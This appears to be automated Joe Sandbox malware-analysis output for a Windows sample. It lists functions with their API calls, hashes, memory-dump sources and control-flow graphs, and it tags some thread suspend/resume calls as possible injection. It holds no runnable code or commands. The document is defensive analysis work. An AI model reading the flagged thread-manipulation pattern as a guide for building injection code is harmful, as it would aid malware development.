                                                                                                    • Instruction ID: 0afc1705c8ef5555bbc12df09063c9a7959b18475b1ae8a7e10e7ff1d8de3130
                                                                                                    • Opcode Fuzzy Hash: 2502261a1989e788efe1c4a516c0c055de73b9a09e5687cc24d29f43af0b0ef6
                                                                                                    • Instruction Fuzzy Hash: 7DE02B33A07D7285B261327A3D1276F07844FD1378B15361AF610F70F3CE50880644A2
                                                                                                    Function 00E10FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00E11101,?,?,00E1117F,?,?,?,?,?,00E11169), ref: 00E10FEA
                                                                                                    • GetLastError.KERNEL32(?,?,00E1117F,?,?,?,?,?,00E11169), ref: 00E10FF6
                                                                                                      • Part of subcall function 00E06C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E06C54
                                                                                                    Strings
                                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00E10FFF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                    • Opcode ID: da89ab528a112660aa4da8ebc54c608327891fbebef4170f5643f2b9f7fbcf95
                                                                                                    • Instruction ID: dc8ab3f6befe44e58beda6d49b1a47831620d748bbdcfbcdcb8d41894d7ef842
                                                                                                    • Opcode Fuzzy Hash: da89ab528a112660aa4da8ebc54c608327891fbebef4170f5643f2b9f7fbcf95
                                                                                                    • Instruction Fuzzy Hash: F9D02E729086343ADA203334AC4EEAE7C04CB62332F202744F138712F2CA2449D18A92
                                                                                                    Function 00E0E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00E0DA55,?), ref: 00E0E2A3
                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00E0DA55,?), ref: 00E0E2B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindHandleModuleResource
                                                                                                    • String ID: RTL
                                                                                                    • API String ID: 3537982541-834975271
                                                                                                    • Opcode ID: 7f8dcc8f257a97df049cf181fce90d7e41a91ae534229954ee34e63edd8117e8
                                                                                                    • Instruction ID: 97420e4e9fe3f16cf10fec1ddacb2c503bad6c3a857b4f98121fa470923178af
                                                                                                    • Opcode Fuzzy Hash: 7f8dcc8f257a97df049cf181fce90d7e41a91ae534229954ee34e63edd8117e8
                                                                                                    • Instruction Fuzzy Hash: 58C012316407106AEA3427766D4DF936E585B00B16F091858B281FE6E2DAE5C9C8CAA0
                                                                                                    Function 00E1E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E467
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: p$z
                                                                                                    • API String ID: 1269201914-1258701225
                                                                                                    • Opcode ID: a7527dc3531a1e2fc736042e7946467f18c3de3c6d42df670cb68d7da6660434
                                                                                                    • Instruction ID: 881fff04b8cd4caeb91863219ad4e9072bd196a6f735cde23d5907a11d56a788
                                                                                                    • Opcode Fuzzy Hash: a7527dc3531a1e2fc736042e7946467f18c3de3c6d42df670cb68d7da6660434
                                                                                                    • Instruction Fuzzy Hash: FFB012E1699141BC314891242C07CB7014CC8C0F90B30B02EFC14F0281D8408CC50532
                                                                                                    Function 00E1E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E467
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: U$z
                                                                                                    • API String ID: 1269201914-4031037884
                                                                                                    • Opcode ID: 543b5cea78f3528d8018ae521a0c354e75c13747b9a0ae8d75aa4ded011633a4
                                                                                                    • Instruction ID: 6fa0f7d63be4714c285208db3de188063d46742906653ae6059ce71f57f15429
                                                                                                    • Opcode Fuzzy Hash: 543b5cea78f3528d8018ae521a0c354e75c13747b9a0ae8d75aa4ded011633a4
                                                                                                    • Instruction Fuzzy Hash: 52B012F1298100BC310815202D07CB7120CC8C0F50B30F02EFE10F0182D8414EC60432
                                                                                                    Function 00E2BEE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CommandLine
                                                                                                    • String ID: `%Z
                                                                                                    • API String ID: 3253501508-3571153471
                                                                                                    • Opcode ID: ca527f6b4ba231e37bb6c4b3101f5c4adbe42022587a3afc21c847f259925088
                                                                                                    • Instruction ID: e2ab3cfd134c80c65730cb7c3094a9f440b870e17ee7a9fc7109b36b2baf15d4
                                                                                                    • Opcode Fuzzy Hash: ca527f6b4ba231e37bb6c4b3101f5c4adbe42022587a3afc21c847f259925088
                                                                                                    • Instruction Fuzzy Hash: FAB092B880260C8FD7008F33F80C4097FB0BB08382380595AD902E6330DB74418DDF00

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:3.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:12
                                                                                                    Total number of Limit Nodes:0
                                                                                                    execution_graph 15843 7ffd9bc6d700 15844 7ffd9bc6d706 ResumeThread 15843->15844 15846 7ffd9bc6d814 15844->15846 15839 7ffd9bc6c00d 15840 7ffd9bc6c01b SuspendThread 15839->15840 15842 7ffd9bc6c0f4 15840->15842 15835 7ffd9bc6d869 15836 7ffd9bc6d877 CloseHandle 15835->15836 15838 7ffd9bc6d954 15836->15838 15847 7ffd9bc6f4c5 15848 7ffd9bc6f4df GetFileAttributesW 15847->15848 15850 7ffd9bc6f5a5 15848->15850

                                                                                                    Executed Functions

                                                                                                    Function 00007FFD9BAC0D74 Relevance: .3, Instructions: 287COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 289 7ffd9bac0d74-7ffd9bac0d87 290 7ffd9bac0d8a-7ffd9bac0dc9 289->290 291 7ffd9bac0d89 289->291 293 7ffd9bac0dcb 290->293 294 7ffd9bac0dd0-7ffd9bac0e39 call 7ffd9bac07d0 290->294 291->290 293->294 303 7ffd9bac0e3b-7ffd9bac0e6d 294->303 304 7ffd9bac0e70-7ffd9bac0ebb 294->304 303->304 311 7ffd9bac0ebd-7ffd9bac0ed2 304->311 312 7ffd9bac0ed3-7ffd9bac0fb3 304->312 311->312 324 7ffd9bac0fbb-7ffd9bac10ac 312->324
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 562020395e581b84d42c0f8829cc2b13a398dd7e3c1dcc2264f91ac0cb89b74b
                                                                                                    • Instruction ID: 476a45c94336b5a35bd68e0fb202484ca86b1b4f4e9bf9bdb750045385ec6271
                                                                                                    • Opcode Fuzzy Hash: 562020395e581b84d42c0f8829cc2b13a398dd7e3c1dcc2264f91ac0cb89b74b
                                                                                                    • Instruction Fuzzy Hash: B7A1C075A19A4D8FE798EB68C8657A97FE2FF59310F4002BED008D72D6CBB42851CB40
                                                                                                    Function 00007FFD9BC6D700 Relevance: 1.7, APIs: 1, Instructions: 172threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1785340995.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bc60000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: e7cbb5f1b363190914ba98ecc1da47637c5e3684573113d4ee264f4afaed8944
                                                                                                    • Instruction ID: 90f67d5c8e1a1e9b79da0208137a1cda50576d256736be2031bfd0bf1d71b5eb
                                                                                                    • Opcode Fuzzy Hash: e7cbb5f1b363190914ba98ecc1da47637c5e3684573113d4ee264f4afaed8944
                                                                                                    • Instruction Fuzzy Hash: 82516B7090D78C8FDB5ADFA8C855AE9BFF0EF16310F1441ABD049DB2A2DA349846CB11
                                                                                                    Function 00007FFD9BC6C00D Relevance: 1.6, APIs: 1, Instructions: 140threadinjectionCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 12 7ffd9bc6c00d-7ffd9bc6c019 13 7ffd9bc6c024-7ffd9bc6c0f2 SuspendThread 12->13 14 7ffd9bc6c01b-7ffd9bc6c023 12->14 18 7ffd9bc6c0f4 13->18 19 7ffd9bc6c0fa-7ffd9bc6c144 13->19 14->13 18->19
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1785340995.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bc60000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SuspendThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 3178671153-0
                                                                                                    • Opcode ID: b9739085556d8a02abb2d59a32ae904d0445d897d3dd8f9dd0011372f3032b64
                                                                                                    • Instruction ID: 64dea1f66d4560dbde88a6608508406362270f1e29430e793486d4ba2e61a756
                                                                                                    • Opcode Fuzzy Hash: b9739085556d8a02abb2d59a32ae904d0445d897d3dd8f9dd0011372f3032b64
                                                                                                    • Instruction Fuzzy Hash: 9B416930E0864D8FDB58DFA8C894AEDBBF0FF5A311F10416AD049E7292DA34A885CF40
                                                                                                    Function 00007FFD9BC6F4C5 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 22 7ffd9bc6f4c5-7ffd9bc6f5a3 GetFileAttributesW 26 7ffd9bc6f5ab-7ffd9bc6f5e9 22->26 27 7ffd9bc6f5a5 22->27 27->26
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1785340995.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bc60000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: f4bc7aafd848fdf4af6f8703edda4b0b7e6333e1bfdf67efa5686d2f35cbe10c
                                                                                                    • Instruction ID: 1348d755b9d8f6a18b64ca13cf9f2b9857663f0f0533bf7822c089978e0d34f6
                                                                                                    • Opcode Fuzzy Hash: f4bc7aafd848fdf4af6f8703edda4b0b7e6333e1bfdf67efa5686d2f35cbe10c
                                                                                                    • Instruction Fuzzy Hash: F1411970E0865C8FDB98DF98D895BEDBBF0EB59310F10416ED009E7252DA719845CF40
                                                                                                    Function 00007FFD9BC6D869 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 29 7ffd9bc6d869-7ffd9bc6d875 30 7ffd9bc6d880-7ffd9bc6d952 CloseHandle 29->30 31 7ffd9bc6d877-7ffd9bc6d87f 29->31 35 7ffd9bc6d954 30->35 36 7ffd9bc6d95a-7ffd9bc6d9ae 30->36 31->30 35->36
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1785340995.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bc60000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: c534d4ba05112b0901a11539edbbff889c61356d457c14299f5cdeb94981200d
                                                                                                    • Instruction ID: 6bb1970cbed07c01a7e770209c4a7c99e4b6a349f467fc58077ac3a24b980bd5
                                                                                                    • Opcode Fuzzy Hash: c534d4ba05112b0901a11539edbbff889c61356d457c14299f5cdeb94981200d
                                                                                                    • Instruction Fuzzy Hash: CA416E30D0864D8FDB58DFA8C894BEDBBF0FF5A310F1041AAD049E7292DA349885CB41
                                                                                                    Function 00007FFD9BAC08D0 Relevance: .2, Instructions: 183COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 449 7ffd9bac08d0-7ffd9bac08d9 451 7ffd9bac0916-7ffd9bac0949 449->451 452 7ffd9bac08db-7ffd9bac08e6 449->452 455 7ffd9bac0986-7ffd9bac098f 451->455 456 7ffd9bac094b-7ffd9bac095f 451->456 452->451
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 56272466beb92ea4d62525f511c7c06dc7fca9f90904eb74968ad199acb474fc
                                                                                                    • Instruction ID: 370de7071b61cf7ef3b5d195c98d680f7bcdec5c07c0b5c1b9853b2e12273c21
                                                                                                    • Opcode Fuzzy Hash: 56272466beb92ea4d62525f511c7c06dc7fca9f90904eb74968ad199acb474fc
                                                                                                    • Instruction Fuzzy Hash: 0951E431A0855D8FDB54FFA8D8A4AFD7BA0EF58329F0402BBE40DD7196CE246481C784
                                                                                                    Function 00007FFD9BAC163A Relevance: .1, Instructions: 149COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b7cd83386726c582396df48e1fb916ceb17a7135d515ca27c7806fc0f6f11dd1
                                                                                                    • Instruction ID: 688337b99746ea5213440651d5150c36fb150b0644b64a3b00820bb115bdd3c0
                                                                                                    • Opcode Fuzzy Hash: b7cd83386726c582396df48e1fb916ceb17a7135d515ca27c7806fc0f6f11dd1
                                                                                                    • Instruction Fuzzy Hash: 71411832F0D65D8FD720EB9CD8645FA7BA0EFA6325F0903BBD198871A2ED3525058740
                                                                                                    Function 00007FFD9BAC0908 Relevance: .1, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c742a518d63d464e16a07c2e1bb08118efd72ab5bef50bfdc398f9fa1e5b7de9
                                                                                                    • Instruction ID: f6b0037450b4ea21d00d6d121fdf7ac22983c40432129ce536d4c839fbe02bcc
                                                                                                    • Opcode Fuzzy Hash: c742a518d63d464e16a07c2e1bb08118efd72ab5bef50bfdc398f9fa1e5b7de9
                                                                                                    • Instruction Fuzzy Hash: 0B516D70A0490E9FCF84EF98D494EEDBBF1FF58325B150269E419E7260DA74E990CB90
                                                                                                    Function 00007FFD9BAC0998 Relevance: .1, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ec037ce451dc05f5a4f48c0f4257710295b1eed82a67e05dfa7e862b0f964049
                                                                                                    • Instruction ID: 161d4e2060d35ff9704e7a551b8131c56ed2003ab7c91c7c8a92a5ad0d8f5375
                                                                                                    • Opcode Fuzzy Hash: ec037ce451dc05f5a4f48c0f4257710295b1eed82a67e05dfa7e862b0f964049
                                                                                                    • Instruction Fuzzy Hash: 6C413B70A1490D8FDB94EF98C8A4AEDB7F1FF98311F110169D409E32A5CB34A981CB81
                                                                                                    Function 00007FFD9BACA821 Relevance: .1, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5772485edd8728574d2cef4859ce1419772bfc593c14b7bcdd74c8452ba3e401
                                                                                                    • Instruction ID: d5da7942dbd2fc6394ad10b1020c8324bf2533a17e62709901d4d22198946a61
                                                                                                    • Opcode Fuzzy Hash: 5772485edd8728574d2cef4859ce1419772bfc593c14b7bcdd74c8452ba3e401
                                                                                                    • Instruction Fuzzy Hash: 8041FD30A0891D8FDBA8EB14C865EB977B1EF59315F5002EAD00EE72A5CE746A85CF41
                                                                                                    Function 00007FFD9BACA8C3 Relevance: .1, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 03641709ad75ed643c164a8608847a65fd41a3587c8c645b4a25209ab7e1c586
                                                                                                    • Instruction ID: af4446ee12aa8e5a468c14a7ce3161875e571e769f079ac0fc9ead64e3eb7729
                                                                                                    • Opcode Fuzzy Hash: 03641709ad75ed643c164a8608847a65fd41a3587c8c645b4a25209ab7e1c586
                                                                                                    • Instruction Fuzzy Hash: 4541EC30A0492D8FDFA8DF18CC54EA9B7B1EB54315F1002EE900EE72A4CE755A85CF41
                                                                                                    Function 00007FFD9BAC4A61 Relevance: .1, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cec0750f1b93bbd29e728068d3a70fd7610d7f4e2c32cc3f45b7e10b4935b803
